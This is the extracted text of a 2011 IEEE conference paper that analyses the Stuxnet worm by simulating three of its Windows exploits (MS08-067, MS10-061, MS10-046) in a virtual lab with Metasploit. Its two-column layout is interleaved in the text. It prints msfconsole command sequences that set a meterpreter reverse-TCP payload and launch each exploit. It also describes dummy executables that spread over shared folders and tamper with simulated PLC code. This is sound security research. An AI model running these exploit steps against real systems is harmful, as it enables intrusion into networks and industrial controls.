2011 Frontiers of Information Technology

SWAM: Stuxnet Worm Analysis in Metasploit

Rahat Masood, Um-e-Ghazia, Dr. Zahid Anwar

Department of Computing
School of Electrical Engineering and Computer Science (SEECS)
National University of Science and Technology (NUST)
Islamabad, Pakistan
10msccsmmasood,10msccssghazia,zahid.anwar@seecs.edu.pk

phase when it finds its actual target i-e Siemens WinCC

Abstract---Nowadays cyber security is becoming a great control and monitoring system connected to PLC it starts
challenge. Attacker’s community is progressing towards functioning and deviates them from their normal behavior.
making smart and intelligent malwares (viruses, worms and WinCC is a tool developed by Siemens to control the
Rootkits). They stealth their existence and also use operation and working of PLCs.
administrator rights without knowing legal user. Stuxnet We have simulated three vulnerabilities of Stuxnet worm
worm is an example of a recent malware first detected in July through Metasploit framework. It is an open source hacking
2010. Its variants were also detected earlier. It is the first type framework written in ruby language. It is used to exploit,
of worm that affects the normal functionality of industrial execute and write code for vulnerabilities and can also be
control systems (ICS) having programmable logic controllers used to configure build in exploits and their payloads for
(PLC) through PLC Rootkit. Its main goal is to modify ICS
analysis. It consists of other tools of hacking like
behavior by changing the code of PLC and make it to behave
in a way that attacker wants. It is a complex piece of malware
penetration testing, password cracking and much more.
having different operations and functionalities which are II. INTRODUCTION
achieved by exploiting zero day vulnerabilities. Stuxnet
exploits various vulnerable services in Microsoft Windows. In Stuxnet contains user as well as kernel level Rootkit that
this paper we will show real time simulation of first three hides their existence to gain root level privileges. Stuxnet
vulnerabilities of these through Metasploit Framework 3.2 and can spread through the following ways:
analyze results. A real time scenario is established based on • Removable drive
some assumptions. We assumed Proteus design (pressure • Network shares
sensor) as PLC and showed after exploitation that the pressure • RPC Vulnerability
value drops to an unacceptable level by changing Keil code of
• Print Spooler Vulnerability
this design.

Keywords-Stuxnet, Programmable Logic Controllers, Print Removable drive infected with Stuxnet worm contains
Spooler, Backtrack, Metasploit Framework six shortcut malicious files:

I. BACKGROUND Copy of Shortcut to.lnk

Stuxnet is one of the most sophisticated and recent worm Copy of Copy of Shortcut to.lnk
that hit cyber world in July 2010. It hits Iranian nuclear Copy of Copy of Copy of Shortcut to.lnk
facilities. Senior Director of security response at Symantec Copy of Copy of Copy of Copy of Shortcut to.lnk
reported that Iran is the only country that suffers a lot (about ~WTR4141.TMP
60%) through this worm. Common predictions are that this ~WTR4132.TMP
worm can target either Bushehr Nuclear power plant or
Natanz nuclear facility in Iran [7]. First four shortcut files related to different operating
Computer security experts in Iran are convinced that Systems. Like the first .lnk file executes on windows 7 not
Stuxnet mainly targets uranium facility at Natanz which on windows XP, second on windows Vista and last two on
affects centrifuges speed. Their rotational speed first windows XP, windows server 2003 and windows
increases then drop to introduce distortions and disturb their 2000.After finding the corresponding operating system .lnk
normal behavior. An assumption is that 10% of centrifuges file in turn executes two .tmp temporary files which are
in Natanz have been affected through this worm from 2009 actual payloads of Stuxnet.
to 2010. This evidence indicates that it is one of the first Stuxnet exploits MS-08-067 Microsoft windows server
worms designed by nation states [7]. service vulnerability in which malicious payload is copied
There are two main phases of Stuxnet worm: first is and executed through shared credentials on network.
“propagation phase” which is the characteristic of each Stuxnet enumerates users and admin account information
worm and second one is “injection phase”. In first phase, through either windows management instrumentation (WMI)
Stuxnet worm propagates in local area network and update or scheduled job. After enumerating account details Stuxnet
its files through peer to peer communication. In second copied malicious file as random file name in shared folder

978-0-7695-4625-4/11 $26.00 © 2011 IEEE 142

DOI 10.1109/FIT.2011.34

Authorized licensed use limited to: Yildirim Beyazit Univ. Downloaded on October 10,2021 at 17:12:36 UTC from IEEE Xplore. Restrictions apply.
and next jobs are scheduled according to it. In case of WMI Eset made another detailed report, in this report first of
instead of users credentials explorer.exe file is used for all comparison is made between Stuxnet and Aurora in
copying. terms of exploitation vector and targeted malicious program.
Second vulnerability of Stuxnet worm is MS10-061 print Different characteristics like payload, code packing, code
spooler vulnerability. Any system which has shared print obfuscation, establishing a backdoor, communications
rights in a network is vulnerable to this. It allows a remote protocol, update mechanism and multiple distribution
user to copy files in %SYSTEM% directory in which user vectors of both attacks are discussed. Timelines of different
has no access. Exploitation in this case comprises two important events related to Stuxnet are given. Two privilege
phases: injection and execution phase. Injection phase of escalation of exploits in addition to three described above
involves copying “winsta.exe” and"sYsnuIlevnt.m0f" in are completely analyzed. Their general behavior, payloads
windows %SYSTEM% directory. Spooler impersonates that that they execute and their functioning according to Stuxnet
client sends two files for printing. Execution phase involves are revealed. Microsoft patches for these exploits are also
triggering these two copied files. As file execution is explained. Stuxnet implementation is given in terms of user
automatic “sYsnullevnt.mof” in managed object format calls mode and kernel mode functionality. Architecture of
“winsta.exe”. Stuxnet RPC server and criteria for stealing digital
MS10-046 Microsoft windows .LNK/.PIF vulnerability certificates by Stuxnet is given [2].
manages how shortcut icons of files are displayed in One more article on Stuxnet discusses its analysis and
windows. These icons are loaded from CPL windows history. It has two parts part I contains examination of
control panel file by calling function LoadLibrayW ( ). Stuxnet worm and part II has technical analysis of this
Stuxnet changes “File location info” field in .LNK header. worm. Part I has detailed history of Stuxnet, different views
In this way user is redirected to malicious path and attacker related to it, news and information’s of different countries
gains access to system when user opens internet explorer are given. Part II contains technical details like exploitation
and that specific path. This path is of malicious dll which of vulnerabilities, malware installation, Command and
actually changes PLC programming in ICSs. Control server operation, RPC server installation, infection
We have simulated above three vulnerabilities using of WinCC environment and detection of SCADA systems
Metasploit Framework 3.5 integrated with Linux Backtrack are discussed. To conclude this part short question and
4. Metasploit Framework is a platform used by security answers related to Stuxnet from F-Secure laboratory is
professionals and researchers for performing penetration given. After this there is a complete discussion of elevation
testing, exploiting vulnerabilities, and writing new exploits of privileges vulnerability “keyboard layout MS 10-073”
and also to verify the patch installation. Backtrack is a used by Stuxnet under windows 2000 and XP and learn how
flavor of Linux which is particularly designed for security associated proof of concept is developed. In the end of this
professionals for performing assessments in a purely native article top ten hacking techniques of year 2010 are given [3].
environment dedicated to network security. To show the Another detailed paper which is written under the
changes in PLC programming we have used proteus design supervision of Fraunhofer institute of secure information
of pressure sensor and through meterpreter we have technology mainly discusses impact of Stuxnet malware on
uploaded malicious file which affects the output of this industrial control systems. Some prevention mechanisms
sensor. and procedures are also discussed. Like isolation of
Paper further proceeds in the following manner: Section industrial control systems, security awareness, staff
III describes related work, Section IV gives the architectural education, event monitoring and maintaining compliance
view of our project, Section V presents implementation through long system life [4].
phase and attack scenario, Section VI shows evaluation For Metasploit Framework help we consider fourth and
results and Section VII conclusion and future work. fifth chapter of “Gray Hat Hacking: The Ethical Hacker’s
Handbook”. In these chapters links are given for Metasploit
III. RELATED WORK Framework installation. Step by step procedure and
As Stuxnet is recent malware, there is no proper research commands are given for exploiting and configuring
papers related to it, so we studied reports, documents, particular vulnerability through Metasploit console interface.
detailed survey papers and articles related to it. Brief introduction of meterpreter (Metasploit payload) is
Symantec Security response made a detailed report on given that it does not create any additional process on
analysis of Stuxnet worm. Main features of Stuxnet, its victim’s machine and inject itself in to process memory.
infection ratio throughout world, propagation methods, Other than exploitation different uses of Metasploit
exports and exploits are discussed in this report. It explains Framework are given: Using Metasploit as man-in-middle
the complete history of Stuxnet before it actually hits Iran password stealer, Metasploit as a malicious SMB (server
nuclear industry. Stuxnet architecture, its Rootkit message block) server, using Metasploit to auto attack [5].
functionality, general working of WinCC computers
connected to PLC is discussed. There is also complete IV. ARCHITECTURE
information related to AutoRun.Inf file which was present in We simulated three main vulnerabilities that a Stuxnet
older version of Stuxnet. General behavior of Siemens exploit. Architectural diagram of our project is shown in
software and how Stuxnet affects Step 7 project files are Figure 1. Here C&C server acts as Backtrack 4 and
explained [1]. Metasploit Framework acts as USB. User issue commands

143

Authorized licensed use limited to: Yildirim Beyazit Univ. Downloaded on October 10,2021 at 17:12:36 UTC from IEEE Xplore. Restrictions apply.
 B. MS10_061_spoolss (Print Spooler Server)
This vulnerability is also used to propagate itself via
LAN. But its main target is print server. In our simulation,
we installed a print server in one of the XP machines and
show the propagation of dummy exe files on LAN. Flow
diagram of implementing this vulnerability is shown in
figure 4.
C. MS10_046_dllloader (.LNK Vulnerability)
Figure 2: Hierarchy of Stuxnet Simulation Tools This is the first way in which the Stuxnet root kit
distributes itself. We exploit this vulnerability on a windows
via Metasploit to PC’s (1, 2, 3, 4, and 5) connected in LAN. system containing Keil and proteous. Our dummy exe
First Server Service vulnerability is exploited in PC 1 “plc.exe” when uploaded and executed on PLC based
that contains shared folder. Any other PC on LAN who machine, will change the content of the Keil file and as a
accesses this shared folder gets infected with worm. Second result circuit designed on proteous of pressure sensor
vulnerability is exploited through Print Server. PC’s on changes its output. It gives alert signal i-e pressure becomes
LAN when send print request to server will get affected. too low. Figure 1 gives a clear overview.
For second Phase, another LAN is created between C&C
and PC 6. PC 6 contains Keil and Proteus software. When
C&C server issues commands coding of our project
Pressure Sensor in Keil Changes and as a result Circuit
Diagram in Proteous when run gives Alert.
The environment of our project is best described by
Figure 2. Different virtual machines i.e. one Linux and three
windows XP are used in our project.
Metasploit Framework is an important tool in our project
that is used to exploit the windows vulnerabilities. Each of
three vulnerabilities has its own functionality and is
executed differently from each other. The steps that we
follow in order to execute these exploits are explained via
flowchart.
A. MS08_067_netapi (Server Service)
Stuxnet worm is capable of spread itself through
network shares i.e. shared folders. Simulation of this
vulnerability through Metasploit framework is demonstrated Figure 3: Flow Diagram of Server Service Vulnerability
through the figure 3.

Figure 1: Architecture of SWAM

144

Authorized licensed use limited to: Yildirim Beyazit Univ. Downloaded on October 10,2021 at 17:12:36 UTC from IEEE Xplore. Restrictions apply.
 Stuxnet initially propagates through USB drive but in
our scenario we are considering Metasploit framework as
USB that exploits vulnerabilities. Configurations (setting
parameters value) are performed before exploitation.
Important parameters are:
• PAYLOAD
• Local Host (LHOST)
• Remote Host (RHOST)
• Exploit name
PAYLOAD is a code that an attacker wants to execute
Figure 4: Flow Diagram of Print Spooler Vulnerability on a target machine, LHOST contains the IP address of
source machine (e.g. an attacker machine), RHOST is
victim IP address and with Use command the name of
exploit is given. Once vulnerability is exploited, a
meterpreter session is opened that allow attacker (Metasploit
framework user) to execute, insert any malicious data on
victim PC. In order to show that our Stuxnet works like real
Stuxnet, we have implemented our own dummy Stuxnet
code in C#. These are the main commands that are mostly
used in every exploit.

1 msf > use exploit/windows/smb/ms08_067_netapi

2 msf exploit (ms08_067_netapi) > show payloads
3 msf exploit (ms08_067_netapi) > set PAYLOAD
windows/meterpreter/reverse_tcp
4 msf exploit (ms08_067_netapi) > set LHOST [Attacker
IP Address]
Figure 5: Flow Diagram of .LNK Vulnerability
5 msf exploit(ms08_067_netapi) > set RHOST [Victim IP
Address]
V. IMPLEMENTATION
6 msf exploit (ms08_067_netapi) > exploit
In our project, we mainly focus on three main exploits
that a Stuxnet uses to exploit industrial windows based
systems. We use Virtual machines to carry out simulations. Line 1 is used to give the exploit name that we want to
For this, three windows XP SP2 machines and one back use e.g. ms08_067/0netapi. Line 2 will give a complete list
track is installed on virtual box. We performed all our of payloads that can be used with a particular exploit. Set
simulation in virtual environment. We connect all of these command on line 3 is used to select the payload. Similarly,
machines with a network; all of them have different IP set command on line 4 and 5 is also used to set the IP
addresses. address of attacker and victim IP address. Exploit command
As mentioned above we have used Metasploit on line 6 is the last command that finally executes or run the
framework to exploit three main vulnerabilities that Stuxnet exploit.
uses. We have used console interface of Metasploit After entering the above commands, meterpreter session
framework called as msfcli. is opened; then we inserted our exe named “Stuxnet.exe” on
Stuxnet exploit four zero day vulnerabilities plus one the shared folder in LAN. This exe is written in C# that
patched vulnerability. We have simulated exploitation of when executed by any other computer on LAN copies and
two zero day and one patched vulnerability. Working of hide itself. Thus one of the characteristics of Stuxnet to
these exploits is discussed below: propagate via shared network is shown through this
exploitation and exe. It will propagate itself when any PC
on LAN get access to that shared folder containing exe. For
A. Server Service (ms08_067) results of these commands see Appendix B.
MS08_067 vulnerability is already patched by Microsoft;
it allows arbitrary code execution from SMB clients sending B. Print Spooler (MS10-067)
specially crafted (malformed) path strings. W32.Stuxnet Another way in which the Stuxnet replicates itself over
uses this vulnerability to replicate itself to unpatched remote the network is by exploiting vulnerability in Window
PCs on the LAN after verifying its patch status. Spooler (MS10-061). This vulnerability results in privilege
We used this vulnerability to get access to network escalation allowing a remote user using a Guest account to
shares like shared folders on the LAN and when any write into %SYSTEM% directory of the target machine.
machine on the LAN accesses this folder, Stuxnet files get Worm copies additional file into
copied to that machine and hide themselves. Windows\System32\winsta.exe and
Windows\System32\wbem\mof\sysnullevnt.mof

145

Authorized licensed use limited to: Yildirim Beyazit Univ. Downloaded on October 10,2021 at 17:12:36 UTC from IEEE Xplore. Restrictions apply.
 respectively. itself on LAN and hide itself while other exe is used to
For our scenario, Metasploit framework exploit change the functionality of the PLC.
ms10_061_spoolss is used. Using same initial commands as • Original PLC software is not available so Keil and
given above, this vulnerability is exploited on the machine proteous is used to show functionality of PLC.
containing print server.
VI. EVALUATION & RESULTS
1 msf> use exploit/windows/smb/ms10_061_spoolss In the above section, we have already described
2 msf exploit(ms08_067_netapi)> set PAYLOAD our scenario of simulating three vulnerabilities. We
windows/meterpreter/reverse_tcp successfully exploit and simulate these three vulnerabilities.
3 msf exploit(ms08_067_netapi)> set RHOST Any industrial window based computer that has these
192.168.1.3 unpatched vulnerabilities can be easily exploitable. Table 1
4 msf exploit(ms08_067_netapi)> set LHOST shows the affect of these exploits in our scenario.
192.168.1.50 MS10_061_spoolss can be avoided if the print
5 msf exploit(ms08_067_netapi)> set PNAME 2500C server does not allow any exe file to be printed. If the server
Series PCL5Ce allows exe files to print then it can only entertain those exe
6 msf exploit(ms08_067_netapi)> exploit files having the file name less than ten characters.
MS10_046_dllloader exploit can be prevented at
the user end i.e. if user himself does not make any shortcut
C. .LNK Vulnerability (MS10_046) file of internet explorer.
We have also uploaded a video tutorial of our
From the name it is clear that this vulnerability exploits framework on you tube [6].
the shortcut files having extension of .LNK. As shortcut
files point towards the original location of resource, Stuxnet VII. CONCLUSION & FUTURE WORK
uses this functionality to redirect shortcut files towards its
Stuxnet is the first worm that mainly targets ICS using
malicious DLL. This module creates a WebDAV service
zero day vulnerabilities. As we have simulated Stuxnet
that can be used to run an arbitrary payload. Similar to
exploits in a limited environment (3 Windows XP SP2 and 1
above two exploits, commands are given from Metasploit
Linux Backtrack 4 machines). It can more fastly propagate
framework in order to exploit this vulnerability. Once
in real industrial environment having large number of
exploited, attacker only waits for the victim to open any
unpatched systems and cause a lot of damage to heavy
shortcut file.
machinery.
When a shortcut file is opened a meterpreter session
Stuxnet 1.0 has been mitigated by different anti-virus
starts at attacker side that allows attacker to execute or insert
companies (through signatures), Microsoft vendors (through
any malicious content on victim computer.
patching vulnerabilities) and using tools available on the
.LNK vulnerability mainly spreads through USB so we
internet. Lot of research is being carried out on the analysis
used this exploit on the machine containing PLC controlling
of Stuxnet 1.0 as its source code is still not available. The
ICS. We have used Keil and proteous software as a PLC.
next version of this worm i.e. Stuxnet 2.0 is also under
Through meterpreter, attacker inserts another exe named
consideration.
“plc.exe” at victim computer whose main purpose is to
For the current project we have done simulations
change the code of Keil so that PLC (in our case pressure
through dummy malicious Stuxnet exe files, we can extend
sensor circuit) behaves abnormally.
this work either by analyzing the six Stuxnet files properly
or by implementing pure Stuxnet worm (writing source code)
1 msf> use by ourselves.
exploit/windows/browser/ms10_046_shortcut_icon_dllloa
der VIII. REFERENCES
2 msf exploit(ms08_067_netapi)> set PAYLOAD [1] Nicolas Falliere, Liam O Murchu, and Eric Chien,
windows/meterpreter/reverse_tcp “W32.Stuxnet Dossier”, Symantec Security Response,
3 msf exploit(ms08_067_netapi)> set LHOST Version 1.4, February 2011.
192.168.1.50 [2] Aleksandr Matrosov, Eugene Rodionov, David Harley, Juraj
4 msf exploit(ms08_067_netapi)> exploit Malcho, “Stuxnet Under the Microscope2”, Revision 1.31, 24
Sep 2010.
[3] David Helan, “Stuxnet: Analysis, Mythes and Realities”
D. Assumptions ACTU SECU 27, XCMO, 2011.
[4] Martin Brunner, Hans Hofinger, Christoph KrauSS,
For carrying out Stuxnet simulation, following Christopher Roblee, Peter Schoo, Sascha Todt, “Infiltrating
assumptions have been made: Critical Infrastructures with Next-Generation Attacks
• Stuxnet initial propagation is through USB, we assumed W32.Stuxnet as a Showcase Threat”, Version 1.4, December
that Metasploit framework is USB and exploitation takes 17, 2010.
place through this. [5] Shon Harris, Allen Harper, Chris Eagle, Jonathan Ness, “Gray
• We have made our own Stuxnet exe’s named “plc.exe” Hat Hacking: The Ethical Hacker’s Handbook”, Copyright
and Stuxnet.exe”, function of one exe is to propagate 2008 by McGraw-Hill Companies Second Edition.

146

Authorized licensed use limited to: Yildirim Beyazit Univ. Downloaded on October 10,2021 at 17:12:36 UTC from IEEE Xplore. Restrictions apply.
 Table 1: Results of our Stuxnet Worm Simulation

Exploits Result

MS08_067_netapi (Server Service) • Copy malicious file “Stuxnet.exe” in a folder shared on LAN

• Any machine on LAN when use this file it is automatically copy into that machine

MS10_061_spoolss (Print Spooler) • Print command send to print server containing two random files

• These files are copied to windows system directory

• After it, any print command send to server automatically copies these two random files in
system directory

MS10_046_dllloader (.LNK Vulnerability) • When target machine opens any short cut file, session is established with attacker
machine

• Malicious “plc.exe” file upload to victim machine

Proteus code • Our assumption is that plc.exe file specifically targets PLC machine (having Keil and
Proteus). After uploading it disturbs the normal functionality of pressure sensor.

• Value of pressure drops to zero and sensor generates an alert

[6] Rahat Masood, “Stuxnet Simulation via Metasploit.wmv”,

http://www.youtube.com/watch?v=AZNU7bCRvJg
[7] WikiPedia, “Stuxnet”, http://en.wikipedia.org/wiki/Stuxnet,
October 21, 2011.
[8] Phoonjzc, “Installing BackTrack 4 on Virtual Box with
WindowsHost”,
http://www.youtube.com/watch?v=up2OR1M0aUk

IX. APPENDIX A
For simulating the Stuxnet worm, first and the foremost
thing that we need is backtrack 4 which contains Metasploit
framework within it. Running Backtrack 4 inside a
VirtualBox works well for portable testing needs. [8]
provides a tutorial on how to install a Backtrack 4 in virtual
box.

147

Authorized licensed use limited to: Yildirim Beyazit Univ. Downloaded on October 10,2021 at 17:12:36 UTC from IEEE Xplore. Restrictions apply.